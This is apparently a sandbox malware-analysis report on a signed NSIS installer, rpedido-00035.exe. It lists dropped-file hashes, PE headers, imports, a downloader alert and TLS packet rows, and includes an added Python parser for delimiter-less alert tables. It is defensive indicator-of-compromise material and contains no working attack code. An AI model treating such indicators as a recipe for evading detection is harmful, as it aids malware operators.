                                                        Reputation:low
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):523
                                                        Entropy (8bit):4.30492942039079
                                                        Encrypted:false
                                                        SSDEEP:12:nGy3qcf5opzE6vCdgLMc/Uqv7FE7KRbqYUH6uN0u8vM:GEpxoy6adY/UqvZEwbql6uNh
                                                        MD5:B33890A43FB0F38B6DDF18C5BCEFE234
                                                        SHA1:80ED178A92C2B5CB530AEE4673FFC9011EBF86BB
                                                        SHA-256:3BF02F982A76A4C896FDA78C1C4B2B730D690DD86475213DC415269D4629407B
                                                        SHA-512:169E2D067337BF05BA08D615CE61B28CA4FD93D204966B3386FB4B373D9BACD689BEE3DDC5E04A4F19586E585263F62BC40B0944A10E5867C63C9C7236A5CC48
                                                        Malicious:false
                                                        Preview:clisiocampa percussing acronyctous petitesses pilgrimsrejser zygosphene miasmology konkyljens..labelable kraftls veneries symbolically duncan sulemadens,logopdisk genuinenesses pseudoinspirational bekenderen.franciscanism krftcellers drylots toksikologiskes rottegiftes impecuniary slisken autokratiets hjertebaandet banegaardsbygningen choenix..adrenocorticotropic mangfoldigheders avisudvikling ekstremitetens skamsloges nrede unpersuasion trachling tvrformatets..negerbolle suppressionen lustful bagels flamenco selrets,
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:ASCII text, with very long lines (65536), with no line terminators
                                                        Category:dropped
                                                        Size (bytes):442708
                                                        Entropy (8bit):2.64997516010117
                                                        Encrypted:false
                                                        SSDEEP:1536:k+opYDPkSLujsNOSxsICKcDf7rF4kf9T10JGoihUm5ii/m6gzxyqmxwrWVp/l4g5:ML/mKR9C2me4VOHubkhZj57zlXE9U
                                                        MD5:4AC6472543F65AF4937D690A8AE94380
                                                        SHA1:7BBA85F6A832D3B30726C5D9E3A30660C356C864
                                                        SHA-256:4BCF201D6466DE01A88D56430E774F1EF79F4D020775FFE5E990DC0DE170E242
                                                        SHA-512:FA2CF8156087AA0915C7D5B314ED184C4456266C55EAE1C3CB2563FB6A6D5E1D1A469DE33FBEA226C76DF4439D6DB729C2042366B11788613D17C1228515370F
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):276551
                                                        Entropy (8bit):1.2459972317120458
                                                        Encrypted:false
                                                        SSDEEP:768:q5eLWls2nEEvz9mAEPesDf7zRhfRKrtTgtOnumyYJBW+JAILJcqhOzwnasNP2r2J:q86nLDJnJuki2BaFsfRz
                                                        MD5:0071DC51C79F0655F0BB77074D56B1D7
                                                        SHA1:9617AE1434B07532BAAF39D69CF720C05B85E8F9
                                                        SHA-256:0628FA8F44795D79D5B855E8387985E04D134E8B57FE4D57E663FBAED278DF89
                                                        SHA-512:E2149E9F3B18DCB50E49EC51226D7A6BF3969E119B385410E80E431024B25A938C965C743D80C0C1D8A3820D0DDDA14464CAC75F73AE22F259B447264F8431BA
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:data
                                                        Category:dropped
                                                        Size (bytes):398154
                                                        Entropy (8bit):1.2543435533086644
                                                        Encrypted:false
                                                        SSDEEP:1536:8IfJmHKeJzuGrd0myk0Ek5rFnJd62xZ9WEmaslkcO:8omHKAJR0T8axr
                                                        MD5:7BA8E260D6477B4FD16DAE2D14EA4482
                                                        SHA1:16873CB5BFBA899D4ED937603AA9980F119695D6
                                                        SHA-256:C19F7B3F1A20E1529113EE69AA53DB6E124A51F03098E6FB6AF0E76037C85B8B
                                                        SHA-512:ECAA786515C73B08A44C22FD48B205166611750EC633849823A88BBF95A675CA29FB7F22E652EFCFC055FC92F8381FC6276F4B732F91612A2385BF670131FFF2
                                                        Malicious:false
                                                        Process:C:\Users\user\Desktop\rpedido-00035.exe
                                                        File Type:ASCII text, with CRLF line terminators
                                                        Category:dropped
                                                        Size (bytes):37
                                                        Entropy (8bit):4.046762824854522
                                                        Encrypted:false
                                                        SSDEEP:3:lgov8fOMy:XHB
                                                        MD5:CFDA8E6AADE7958F94A959BDB29CB209
                                                        SHA1:59C459E105A7AF33D13A365F735E3CB7B8E5DDB0
                                                        SHA-256:B4543E8AB4997934D2EDC7DE8A76A24B7C2CCB641212AE3B9B17FE05B71D3E87
                                                        SHA-512:EDFDCA00667ED3A5558F7E614373F0B8393763A979154666972C659CB44E75CCD51170E4E2189043046EB4DDB8A68642BBDB6F98A0E494E76E86FAAF14F993B2
                                                        Malicious:false
                                                        Preview:[xanthippe]..sikkerhedsgraden=preve..
                                                        File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                        Entropy (8bit):7.236355275676429
                                                        TrID:
                                                        • Win32 Executable (generic) a (10002005/4) 99.96%
                                                        • Generic Win/DOS Executable (2004/3) 0.02%
                                                        • DOS Executable Generic (2002/1) 0.02%
                                                        • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                        File name:rpedido-00035.exe
                                                        File size:577'872 bytes
                                                        MD5:13de5fefd3dda5e310cde2fa1e6d4b32
                                                        SHA1:3e54744b089154a3a90ebe930ae8af45879e88a9
                                                        SHA256:7861c46cbb414dbcc6aa51977b94c3532391afa08aaa9907f865e51eb95422b0
                                                        SHA512:ca134f82edc5159d1fb8da61c3bb770d61575ca40229b8ad533900ef98a3d9fbac6fe77ee0d27d87cbbaa2d3c21a7079905286b8c5cad3c022a4a52ce1221ed8
                                                        SSDEEP:12288:TaxXT1s1I7qUEIfakQx8vDkLIuiVS5W57/0fA:WJJAetE5xC2fiVSGcfA
                                                        TLSH:2EC4EF9B6EE2C9DEC8134934A9E5B2B1B5F2ACF057536D0327733AED2C31D118E06259
                                                        File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf.*_9..Pf..Pg.LPf.*_;..Pf..sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....uY.................d...*.....
                                                        Icon Hash:5ce633391c1c0601
                                                        Entrypoint:0x403489
                                                        Entrypoint Section:.text
                                                        Digitally signed:true
                                                        Imagebase:0x400000
                                                        Subsystem:windows gui
                                                        Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                        DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                        Time Stamp:0x5975952E [Mon Jul 24 06:35:26 2017 UTC]
                                                        TLS Callbacks:
                                                        CLR (.Net) Version:
                                                        OS Version Major:4
                                                        OS Version Minor:0
                                                        File Version Major:4
                                                        File Version Minor:0
                                                        Subsystem Version Major:4
                                                        Subsystem Version Minor:0
                                                        Import Hash:1f23f452093b5c1ff091a2f9fb4fa3e9
                                                        Signature Valid:false
                                                        Signature Issuer:CN="Carburetest Realkreditlaan ", E=Outsiderens@Wronger.Fra, L=Abbévillers, S=Bourgogne-Franche-Comté, C=FR
                                                        Signature Validation Error:A certificate chain processed, but terminated in a root certificate which is not trusted by the trust provider
                                                        Error Number:-2146762487
                                                        Not Before, Not After
                                                        • 16/01/2024 08:39:54 15/01/2027 08:39:54
                                                        Subject Chain
                                                        • CN="Carburetest Realkreditlaan ", E=Outsiderens@Wronger.Fra, L=Abbévillers, S=Bourgogne-Franche-Comté, C=FR
                                                        Version:3
                                                        Thumbprint MD5:3B7D88BB19B4D12F392DE615D1872B54
                                                        Thumbprint SHA-1:268D897555CCC4D793C934690FB5F6A6A651A609
                                                        Thumbprint SHA-256:AD760A30FF015FDA84739B200BF7A7BFA27F3A38D43AC5E17655C58AAE28323D
                                                        Serial:5986F0CD36416D42BBC239B65F6809C71E75AB62
                                                        Instruction
                                                        sub esp, 000002D4h
                                                        push ebx
                                                        push esi
                                                        push edi
                                                        push 00000020h
                                                        pop edi
                                                        xor ebx, ebx
                                                        push 00008001h
                                                        mov dword ptr [esp+14h], ebx
                                                        mov dword ptr [esp+10h], 0040A230h
                                                        mov dword ptr [esp+1Ch], ebx
                                                        call dword ptr [004080ACh]
                                                        call dword ptr [004080A8h]
                                                        and eax, BFFFFFFFh
                                                        cmp ax, 00000006h
                                                        mov dword ptr [0042A24Ch], eax
                                                        je 00007F13F49DA503h
                                                        push ebx
                                                        call 00007F13F49DD7B1h
                                                        cmp eax, ebx
                                                        je 00007F13F49DA4F9h
                                                        push 00000C00h
                                                        call eax
                                                        mov esi, 004082B0h
                                                        push esi
                                                        call 00007F13F49DD72Bh
                                                        push esi
                                                        call dword ptr [00408150h]
                                                        lea esi, dword ptr [esi+eax+01h]
                                                        cmp byte ptr [esi], 00000000h
                                                        jne 00007F13F49DA4DCh
                                                        push 0000000Ah
                                                        call 00007F13F49DD784h
                                                        push 00000008h
                                                        call 00007F13F49DD77Dh
                                                        push 00000006h
                                                        mov dword ptr [0042A244h], eax
                                                        call 00007F13F49DD771h
                                                        cmp eax, ebx
                                                        je 00007F13F49DA501h
                                                        push 0000001Eh
                                                        call eax
                                                        test eax, eax
                                                        je 00007F13F49DA4F9h
                                                        or byte ptr [0042A24Fh], 00000040h
                                                        push ebp
                                                        call dword ptr [00408044h]
                                                        push ebx
                                                        call dword ptr [004082A0h]
                                                        mov dword ptr [0042A318h], eax
                                                        push ebx
                                                        lea eax, dword ptr [esp+34h]
                                                        push 000002B4h
                                                        push eax
                                                        push ebx
                                                        push 004216E8h
                                                        call dword ptr [00408188h]
                                                        push 0040A384h
                                                        Programming Language:
                                                        • [EXP] VC++ 6.0 SP5 build 8804
                                                        Name | Virtual Address | Virtual Size | Is in Section
                                                        IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IMPORT | 0x84fc | 0xa0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x57000 | 0x220b8 | .rsrc
                                                        IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_SECURITY | 0x8bd88 | 0x13c8 |
                                                        IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_IAT | 0x8000 | 0x2b0 | .rdata
                                                        IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                                        IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                        Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                        .text | 0x1000 | 0x63d1 | 0x6400 | 139645791b76bd6f7b8c4472edbbdfe5 | False | 0.66515625 | data | 6.479451209065 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                        .rdata | 0x8000 | 0x138e | 0x1400 | 007eff248f0493620a3fd3f7cadc755b | False | 0.45 | data | 5.143831732151552 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        .data | 0xa000 | 0x20358 | 0x600 | ec5bcec782f43a3fb7e8dfbe0d0db4db | False | 0.501953125 | data | 4.000739070159718 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .ndata | 0x2b000 | 0x2c000 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                        .rsrc | 0x57000 | 0x220b8 | 0x22200 | 30cc4d5ad2d805f600d8d9358a38829a | False | 0.1827066163003663 | data | 2.9689436080399076 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                        RT_ICON | 0x572c8 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536 | English | United States | 0.14975452502070272
                                                        RT_ICON | 0x67af0 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864 | English | United States | 0.18344019339920117
                                                        RT_ICON | 0x70f98 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384 | English | United States | 0.21953235710911667
                                                        RT_ICON | 0x751c0 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216 | English | United States | 0.2731327800829875
                                                        RT_ICON | 0x77768 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096 | English | United States | 0.3428705440900563
                                                        RT_DIALOG | 0x78810 | 0x120 | data | English | United States | 0.5138888888888888
                                                        RT_DIALOG | 0x78930 | 0x11c | data | English | United States | 0.6056338028169014
                                                        RT_DIALOG | 0x78a50 | 0xc4 | data | English | United States | 0.5918367346938775
                                                        RT_DIALOG | 0x78b18 | 0x60 | data | English | United States | 0.7291666666666666
                                                        RT_GROUP_ICON | 0x78b78 | 0x4c | data | English | United States | 0.8026315789473685
                                                        RT_VERSION | 0x78bc8 | 0x1b0 | data | English | United States | 0.5601851851851852
                                                        RT_MANIFEST | 0x78d78 | 0x33e | XML 1.0 document, ASCII text, with very long lines (830), with no line terminators | English | United States | 0.5542168674698795
                                                        DLL | Import
                                                        KERNEL32.dll | ExitProcess, SetFileAttributesW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, SetCurrentDirectoryW, GetFileAttributesW, SetEnvironmentVariableW, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, GetVersion, SetErrorMode, lstrlenW, lstrcpynW, CopyFileW, GetShortPathNameW, GlobalLock, CreateThread, GetLastError, CreateDirectoryW, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, WriteFile, lstrcpyA, MoveFileExW, lstrcatW, GetSystemDirectoryW, GetProcAddress, GetModuleHandleA, GetExitCodeProcess, WaitForSingleObject, lstrcmpiW, MoveFileW, GetFullPathNameW, SetFileTime, SearchPathW, CompareFileTime, lstrcmpW, CloseHandle, ExpandEnvironmentStringsW, GlobalFree, GlobalUnlock, GetDiskFreeSpaceW, GlobalAlloc, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, lstrlenA, MulDiv, MultiByteToWideChar, WideCharToMultiByte, GetPrivateProfileStringW, WritePrivateProfileStringW, FreeLibrary, LoadLibraryExW, GetModuleHandleW
                                                        USER32.dll | GetSystemMenu, SetClassLongW, EnableMenuItem, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, ScreenToClient, GetWindowRect, GetDlgItem, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndDialog, RegisterClassW, SystemParametersInfoW, CreateWindowExW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, GetDC, SetTimer, SetWindowTextW, LoadImageW, SetForegroundWindow, ShowWindow, IsWindow, SetWindowLongW, FindWindowExW, TrackPopupMenu, AppendMenuW, CreatePopupMenu, EndPaint, CreateDialogParamW, SendMessageTimeoutW, wsprintfW, PostQuitMessage
                                                        GDI32.dll | SelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                        SHELL32.dll | SHGetSpecialFolderLocation, ShellExecuteExW, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, SHFileOperationW
                                                        ADVAPI32.dll | AdjustTokenPrivileges, RegCreateKeyExW, RegOpenKeyExW, SetFileSecurityW, OpenProcessToken, LookupPrivilegeValueW, RegEnumValueW, RegDeleteKeyW, RegDeleteValueW, RegCloseKey, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                        COMCTL32.dll | ImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                        ole32.dll | OleUninitialize, OleInitialize, CoTaskMemFree, CoCreateInstance
Language of compilation system | Country where language is spoken
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-10-04T17:25:15.462505+0200 | 2803270 | ETPRO MALWARE Common Downloader Header Pattern UHCa | 2 | 192.168.11.20 | 49775 | 142.250.65.206 | 443 | TCP
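Joe Sandbox's text export of the alert and packet tables drops the column delimiters, so a port and the address that follows it run together (the first packet row reads 49775443192.168.11.20142.250.65.206 in the raw export). The following is an added example, not part of the Joe Sandbox report or its tooling: a Python parser that recovers the alert row and packet rows from that delimiter-less form. The sample rows are copied from this report; the field order (two ports then two addresses in the packet table, address-port pairs in the alert table) is an assumption read off the column headers. The parser shows why a greedy regex silently returns the wrong host address (192.168.11.201 instead of 192.168.11.20), enumerates every valid tokenisation instead, and resolves the ambiguity by letting both directions of each TCP conversation vote; the same approach covers the remaining rows of the table, not only the six embedded here.

```python
import re
from collections import Counter

# Constructed sample input: one row of the report's Suricata alert table and six rows
# of its TCP packet table, copied in the delimiter-less form of the text export.
ALERT_ROW = ("2024-10-04T17:25:15.462505+02002803270ETPRO MALWARE Common Downloader "
             "Header Pattern UHCa2192.168.11.2049775142.250.65.206443TCP")
PACKET_ROWS = [
    "Oct 4, 2024 17:25:14.951000929 CEST49775443192.168.11.20142.250.65.206",
    "Oct 4, 2024 17:25:14.951108932 CEST44349775142.250.65.206192.168.11.20",
    "Oct 4, 2024 17:25:14.951371908 CEST49775443192.168.11.20142.250.65.206",
    "Oct 4, 2024 17:25:15.462662935 CEST44349775142.250.65.206192.168.11.20",
    "Oct 4, 2024 17:25:15.611186028 CEST49776443192.168.11.20142.250.65.161",
    "Oct 4, 2024 17:25:15.611233950 CEST44349776142.250.65.161192.168.11.20",
]

# The obvious first attempt: a greedy regex. It misreads the host address (see naive_ips).
NAIVE_IPS = re.compile(r"(\d{1,3}(?:\.\d{1,3}){3})(\d{1,3}(?:\.\d{1,3}){3})$")

def naive_ips(row):
    """Greedy reading of the two trailing addresses; wrong for this data."""
    return NAIVE_IPS.search(row).groups()

def _valid_port(tok):
    return tok.isdigit() and not tok.startswith("0") and 1 <= int(tok) <= 65535

def _valid_octet(tok):
    return tok.isdigit() and (tok == "0" or not tok.startswith("0")) and int(tok) <= 255

def _take(blob, kind):
    """Yield (token, remainder) for every port or IPv4 address that can start `blob`."""
    if kind == "port":
        for n in range(1, 6):
            if len(blob) >= n and _valid_port(blob[:n]):
                yield blob[:n], blob[n:]
    else:  # "ip": only the first and last octets lack a delimiter on one side
        for a in range(1, 4):
            for d in range(1, 4):
                m = re.match(rf"(\d{{{a}}})\.(\d{{1,3}})\.(\d{{1,3}})\.(\d{{{d}}})", blob)
                if m and all(_valid_octet(o) for o in m.groups()):
                    yield ".".join(m.groups()), blob[m.end():]

def readings(blob, kinds):
    """Every tokenisation of `blob` as the given sequence of field kinds ('ip'/'port')."""
    if not kinds:
        return [()] if blob == "" else []
    return [(tok,) + rest
            for tok, tail in _take(blob, kinds[0])
            for rest in readings(tail, kinds[1:])]

def flow_key(sip, sport, dip, dport):
    """Direction-independent identity of a TCP conversation."""
    return frozenset({(sip, int(sport)), (dip, int(dport))})

def resolve_packets(rows):
    """[(timestamp, sip, sport, dip, dport)], choosing per row the reading whose
    conversation is shared with the most other rows (both directions vote)."""
    parsed = []
    for row in rows:
        ts, blob = row.split(" CEST")
        cands = readings(blob, ("port", "port", "ip", "ip"))   # sport, dport, sip, dip
        if not cands:
            raise ValueError(f"unparseable packet row: {row!r}")
        parsed.append((ts, cands))
    support = Counter()
    for _, cands in parsed:
        support.update({flow_key(si, sp, di, dp) for sp, dp, si, di in cands})
    out = []
    for ts, cands in parsed:
        sp, dp, si, di = max(cands, key=lambda c: support[flow_key(c[2], c[0], c[3], c[1])])
        out.append((ts, si, int(sp), di, int(dp)))
    return out

def flow_counts(rows):
    """Packets sent by each endpoint, grouped per resolved conversation."""
    counts = {}
    for _, si, sp, di, dp in resolve_packets(rows):
        counts.setdefault(flow_key(si, sp, di, dp), Counter())[(si, sp)] += 1
    return counts

ALERT_RE = re.compile(r"^(?P<ts>\d{4}-\d\d-\d\dT[\d:.]+[+-]\d{4})(?P<sid>\d+)"
                      r"(?P<sig>\D.*?)(?P<sev>\d)(?P<blob>[\d.]+)(?P<proto>[A-Z]+)$")

def resolve_alert(row, flows):
    """Parse an alert row, keeping the endpoint reading that matches a known conversation."""
    m = ALERT_RE.match(row)
    for si, sp, di, dp in readings(m["blob"], ("ip", "port", "ip", "port")):
        if flow_key(si, sp, di, dp) in flows:
            return {"timestamp": m["ts"], "sid": int(m["sid"]), "signature": m["sig"],
                    "severity": int(m["sev"]), "src": (si, int(sp)), "dst": (di, int(dp)),
                    "proto": m["proto"]}
    return None

if __name__ == "__main__":
    counts = flow_counts(PACKET_ROWS)
    for key, per_endpoint in counts.items():
        print(sorted(key), dict(per_endpoint))
    print(resolve_alert(ALERT_ROW, set(counts)))
```

Only a conversation seen in both directions can be resolved by voting; a one-sided flow keeps its ambiguity and needs an out-of-band hint such as the analysis host's address. With the rows above, the alert resolves to the 192.168.11.20:49775 to 142.250.65.206:443 conversation, which is the first TLS session in the packet table.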
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Oct 4, 2024 17:25:14.951000929 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:14.951108932 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:14.951371908 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:14.972904921 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:14.972917080 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.218158007 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.218310118 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.218310118 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.219764948 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.219997883 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.255723953 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.255795002 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.256758928 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.256927967 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.258954048 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.300318003 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.462662935 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.462881088 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.462980986 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.463084936 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.463169098 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.463279963 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.464127064 CEST | 49775 | 443 | 192.168.11.20 | 142.250.65.206
Oct 4, 2024 17:25:15.464234114 CEST | 443 | 49775 | 142.250.65.206 | 192.168.11.20
Oct 4, 2024 17:25:15.611186028 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:15.611233950 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:15.611499071 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:15.611552954 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:15.611569881 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:15.869079113 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:15.869313002 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:15.873800039 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:15.873846054 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:15.874454021 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:15.874658108 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:15.874929905 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:15.916337967 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.355335951 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.355649948 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.355714083 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.370565891 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.370858908 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.370858908 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.387269974 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.387531996 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.387531996 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.387628078 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.387891054 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.387958050 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.388279915 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.465385914 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.465640068 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.465703964 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.465919971 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.469310045 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.469532013 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.469593048 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.469786882 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.477300882 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.477536917 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.477596998 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.477864027 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.485466003 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.485785961 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.485856056 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.486123085 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.493309021 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.493616104 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.493674040 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.493874073 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
Oct 4, 2024 17:25:18.501584053 CEST | 443 | 49776 | 142.250.65.161 | 192.168.11.20
Oct 4, 2024 17:25:18.501852989 CEST | 49776 | 443 | 192.168.11.20 | 142.250.65.161
